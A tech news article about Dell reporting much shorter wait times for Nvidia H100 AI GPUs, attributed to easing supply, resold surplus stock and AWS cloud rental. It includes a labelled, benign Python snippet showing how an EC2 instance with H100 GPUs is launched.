
Looking for a Nvidia H100 AI GPU? You can get it a bit faster now, says Dell



These days, AI is front and center, especially with ChatGPT, Copilot, and Gemini, but few realize how much raw processing power is needed to keep these services running. Nvidia’s H100 AI GPU is a prime example, being one of the leading graphics processing units used for AI workloads.

But there aren’t that many of them lying around, and demand keeps rising. Take, for example, Sora AI, which is estimated to need 4,200-10,500 Nvidia H100 GPUs running for a month just to train a single model. Factor in the recent shortage of H100 GPUs, and you can imagine how the wait time for new hardware skyrocketed.

The wait times for H100 AI GPUs have significantly shortened.

Imagine a scenario where businesses and tech enthusiasts alike faced a grueling 40-52-week wait for their GPU orders at the end of 2023. Fast-forward to the present, and the landscape has changed dramatically, with lead times plummeting to a mere 8-12 weeks. According to a DigiTimes report citing Terence Liao, General Manager of Dell Taiwan, this shift marks a pivotal moment for the tech industry, particularly for those invested in artificial intelligence (AI) and high-performance computing.

But what’s behind this sudden ease in GPU availability? The supply constraints that once throttled the availability of Nvidia’s H100 AI GPUs are apparently dissipating. The journey from a staggering 11-month wait to a more accessible 2-3 month timeframe is nothing short of remarkable. This improvement is not just a win for Dell but a beacon of hope for the entire tech ecosystem, signaling a potential end to the supply chain woes that have plagued the industry.

Despite the easing of supply constraints, the demand for AI-capable hardware remains sky-high. Businesses increasingly opt for AI servers over general-purpose ones despite the hefty price tag associated with the former. This trend underscores the critical role of AI in shaping the future of technology and business strategies. The reduction in lead times is a testament to the industry’s resilience and adaptability.

Existing H100 stock also seems to play a role in this

Interestingly, this positive shift in GPU availability is partly attributed to companies having a surplus of H100 GPUs and choosing to resell some of their stock to mitigate the high maintenance costs of unused inventory. Additionally, Amazon Web Services (AWS) has played a role in alleviating some of the demand pressure by making it easier to rent Nvidia H100 GPUs through the cloud.
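For illustration only (not from the article): a minimal Python sketch of how a team might rent H100 capacity through AWS instead of waiting on a hardware order, assuming boto3 is installed, AWS credentials are configured, and the account has quota for EC2 P5 instances (a p5.48xlarge bundles eight Nvidia H100 GPUs). The AMI ID is a placeholder, not a real image.

import boto3

# Create an EC2 client in a region that offers P5 (H100-backed) instances
ec2 = boto3.client("ec2", region_name="us-east-1")

# Request a single H100-backed instance
response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",  # placeholder: substitute a real Deep Learning AMI
    InstanceType="p5.48xlarge",       # 8x Nvidia H100 per instance
    MinCount=1,
    MaxCount=1,
)

instance_id = response["Instances"][0]["InstanceId"]
print(f"Requested H100-backed instance: {instance_id}")

In practice, capacity for these instances is often reserved ahead of time rather than launched purely on demand, which is part of why cloud rental can absorb some of the purchase pressure described above.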

For large companies like OpenAI, which are at the forefront of developing their large language models (LLMs), the easing of supply constraints couldn’t come at a better time. These companies require thousands of GPUs to train their models efficiently and effectively. The continued shortening of lead times is a promising sign that they might soon have all the resources they need to push the boundaries of AI even further.

In essence, the GPU landscape is undergoing a significant transformation, and this shift not only benefits the big players in the field but also opens up new possibilities for innovators and creators everywhere.


